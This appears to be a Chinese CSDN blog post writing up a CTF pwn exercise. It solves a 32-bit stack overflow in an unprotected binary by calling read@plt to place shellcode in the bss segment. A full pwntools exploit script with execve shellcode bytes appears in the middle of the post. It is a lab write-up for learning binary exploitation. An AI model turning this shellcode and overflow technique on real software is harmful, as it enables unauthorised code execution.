pwn 练习

已于 2022-05-31 15:16:21 修改
阅读量439 收藏
点赞数
分类专栏: 笔记 ctf 文章标签: 安全 web安全
于 2022-05-31 15:10:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zip471642048/article/details/125065641
版权
笔记 同时被 2 个专栏收录
113 篇文章 5 订阅
订阅专栏
ctf
107 篇文章 4 订阅
订阅专栏

文章目录

read_shellcode

师傅出的一个栈溢出的题,思路就是利用read往bss段写入shellcode然后调用

日常checksec一下,啥都没开

在这里插入图片描述

运行主程序可以看出来,程序读入了一个字符串无打印
gdb调试的时候可以看到是调用了plt的read函数,说明他读入字符串是用的read@plt,我们可以用read往栈或者bss段写东西,或者利用gadget系统调用

在这里插入图片描述

这么几个gadget明显不够,系统调用pass

在这里插入图片描述

可以看到栈可以读可写,bss段也是可读可写,但是没有方法可以泄漏栈上的真实地址,所以采用往bss段写shellcode的方法

在这里插入图片描述

溢出长度 等于24 + 32位ebp = 28

在这里插入图片描述

在构造payload的时候我犯了一个错误就上read函数的参数和gets的参数不太相同
read(0,buf_addr,0x21) ⇒ read,retrun_addr,0,buf_addr,0x21(read读取的字符串长度因为我shellcode长度上21所以我写的就是21)
gets(bufaddr) ⇒ gets,retrun_addr,buf_addr

exp

  1 from pwn import *                                                           
  2 
  3 io = process('./stack')
  4 
  5 elf = ELF('./stack')
  6 bss_align = 0x0804C01C
  7 read_plt_addr = elf.plt['read']
  8 pop_ebx_ret = 0x08049022
  9 main_addr = elf.symbols['main']
 10 print read_plt_addr
 11 
 12 shellcode = b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80'
 13 payload = flat(['a'*28,read_plt_addr,bss_align,0,bss_align,21])
 14 print disasm(shellcode)
 15 io.sendline(payload)
 16 io.sendline(shellcode)
 17 io.interactive()

在这里插入图片描述

[mzq]
关注
专栏目录
攻防世界pwn新手练习(hello_pwn
BurYiA的博客
10-24 3758
hello_pwn 拿到程序后,我们首先checksec一下 可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看 可以看到它是一个输入,然后就啥都没有了emmmm…好吧,咱们继续放到IDA里面看看 ...
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 590
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
PWN练习网站
GJQI12的专栏
04-10 2224
1.什么是PWF CTF比赛主要表现以下几个技能上:逆向工程、密码 学、ACM编程、Web漏洞、二进制溢出、网络和取证等。在国际CTF赛事中,二进制溢出也称之为PWNPWN是一个黑客语法的俚语词,自"own"这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的 情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被...
pwn练习 2022.10.03
m0_53932372的博客
10-03 186
pwn
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
PWN综合练习
WateranFire的博客
10-27 468
合天上的课程笔记 dup2(socket,0)——将socket与标准输入绑定 dup2(socket,1)——将socket与标准输出绑定 realpath(name,&resolved)——将name中的路径转为绝对路径存入resolved 就算realpath调用失败,resolved内还是会填充数据,并且前缀会加上当前路径,构造shellcode时需要注意 有时应该打印出了内容但接
pwn1 一道pwn练习
05-07
pwn练习
CTF-PWN练习之通用跳转技术
ChuMeng1999的博客
01-06 2305
目录预备知识一、相关实验二、strdup函数三、grep命令实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之绕过返回地址限制》。 二、strdup函数 strdup可以用于复制一个字符串,我们通常使用字符串时会使用strcpy,这要求已经定义好了一个接收缓冲区。而strdup只接受一个参数,也就是要复制的字符串的地址,strdup()会先用malloc()配置与参数字符串相同大小的的空间,然后
pwn练习附件四道题含exp
11-21
个人pwn练习题目https://blog.csdn.net/yusakul/article/details/103147299,含exp,推荐去原链接下载:https://bbs.ichunqiu.com/thread-42241-1-1.html
CTF-PWN练习之执行Shellcode
ChuMeng1999的博客
01-05 1544
目录预备知识一、相关实验二、Shellcode三、执行Shellcode实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 本实验要求实验者具备如下的相关知识。 一、相关实验 本实验要求您已经认真学习和完成了《CTF PWN练习之返回地址覆盖》。 二、Shellcode Shellcode指缓冲区溢出攻击中植入进程的恶意代码,这代码可以弹出一个消息框,也可以在目标机器上打开一个监听端口,甚至是删除目标机器上的重要文件等。 Shellcode通常需要使用汇编语言进
攻防世界-pwn 新手练习
hanqdi_的博客
02-24 2386
when_the_your_born 要求v5=1926即可得到flag,而根据程序,v5只要等于1926就进入不了这个分支,也就是说,我们输入的v5不能等于1926。 这里可以利用gets函数的输入v4,来覆盖v5。 v4:ebp-0x20 v5:ebp-0x18 v4和v5相差0x08,即在输入v4时,先输入0x08个垃圾数据,在输入1926即可实现覆盖。 payload如下 from pw...
攻防世界 pwn 新手练习区 hello_pwn
ChaoYue_miku的博客
07-06 538
题目来源: NUAACTF 题目描述:pwn!,segment fault!菜鸡陷入了深思 ** 0、下载附件,使用checksec检查保护情况,尝试打开文件 ** 开启了NX部分RELRO ** 1、使用IDA 64 Pro打开文件 ** 查看main函数 发现了一个read函数,查看一下unk_601068的栈结构 这里是存在栈溢出的,只要覆盖4个字节的内容就可以更改dword_60106C的内容。 接着往后查看main函数: 有一个if条件判断,只要满足dword_60106C == 18531
pwn 练习笔记 暑假第七天
SsMing的博客
07-19 415
题目来自:https://www.jarvisoj.com/challenges level3 checksec查看: ida打开: 栈溢出,buf与ebp相距0x88(136) 一起下载到的还有个libc-2.19.so动态链接库文件,这就很好办啦!二次溢出拿到flag 直接上脚本: from pwn import * #sh = process('level3') ...
pwn 练习笔记 暑假的第一天
SsMing的博客
07-14 439
pwnable  bof 源码如下#include <stdio.h>#include <string.h>#include <stdlib.h>void func(int key){    char overflowme[32];    printf("overflow me : ");    gets(overflowme);    // smash me!...
pwn 练习笔记 暑假十一天
SsMing的博客
07-23 452
题目来自:https://www.jarvisoj.com/challenges guestbook,一道特别简单的题 checksec查看:有个栈不可执行保护,没什么问题 IDA打开查看伪代码,先看main函数: 还看到调用了fopen和fgetc这样的函数,所以找了一下,发现good_game这个函数; 这个函数读取了flag.txt,这个函数的开始地址为000000...
攻防世界 pwn练习区解法 write up
qq_46441427的博客
02-16 845
checksec stack: canary found 是指运行程序时,会把canary取出放入一个rbp定向的值,在退出函数前将rbp定向的值和canary的值进行一个比较(异或一下,看是不是0),如果不相等,则运行_stack_chk_fail函数 NX 数据所在的内存为不可执行,程序溢出转为shellcode时,程序会去在数据页面上执行指令,这个时候CPU抛出异常,不会让它执行 PIE 程序装在随机的地址 ASLR 即使文件开启了PIE保护,还需要开启ASLR才会真正打乱基址 ...
PWN练习之环境变量继承
WateranFire的博客
09-07 1152
一、环境变量参数:       在Linux/Windows操作系统中, 每个进程都有其各自的环境变量设置。 缺省情况下, 当一个进程被创建时,除了创建过程中的明确更改外, 它继承了其父进程的绝大部分环境变量信息。 扩展的C语言main函数可以传递三个参数,除了argc和argv参数外,还能接受一个char**类型 的envp参数。envp指向一个字符串数组,该数组存储了当前进程具体的环境变
意思篇:全开,bss数组溢出,打stdout和data数据区域进行读取(很有意思)
qq_39948058的博客
08-27 559
前言:这道题我看了一个师傅的wp,发现这道题感觉很有意思,所以这里就记录一下,像标题一样,很有意思,这道题大概就是数组溢出bss,在bss有stdin和stdout,stderr,freehook,溢出打这些东西来完成泄露任意写的目的,最后打freehook的时候,要利用一个_IO_file_jumps ----》io——overflow这个东西溢出到onegadget即可,具体看exp就会明白,这里参考了另一个师傅的exp,非常有参考价值,学到很多东西,嘿嘿 exp: from pwn import
[Black Watch 入群题]PWN-栈迁移
个人笔记
04-20 422
细节详情参考:https://blog.csdn.net/mcmuyanga/article/details/109260008。buf溢出栈空间只有0x20-0x18=8字节无法构造rop,所以需要利用栈迁移技术,迁移到bss上构造rop。bss栈布局:(左边是第一泄露Libc构造栈帧,右边是第二次重写获取shell的栈帧)改变思路:由于此程序没有可直接ret利用的函数同时溢出空间很小,所以需要。栈迁移操作:构造好栈中ebp新位置。思路:ret2shellcode。栈迁移关键指令:leave。
pwn 环境变量继承
最新发布
08-13
在Linux中,当父进程启动一个子进程时,子进程会继承父进程的环境变量信息。这意味着子进程会拥有与父进程相同的环境变量参数。在Shell中,可以通过export命令给Shell添加一个环境变量,此后通过Shell启动的子进程都会拥有这个环境变量。除了通过export添加环境变量,还可以使用函数getenv、putenv、setenv等对环境变量进行操作。在Python中,可以使用os模块的相应函数来创建子进程和修改环境变量参数。os.system函数可以创建一个子进程,且子进程会继承父进程的环境变量参数信息;os.putenv可以修改进程的环境变量参数信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [CTF-PWN练习之环境变量继承](https://blog.csdn.net/ChuMeng1999/article/details/122302920)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值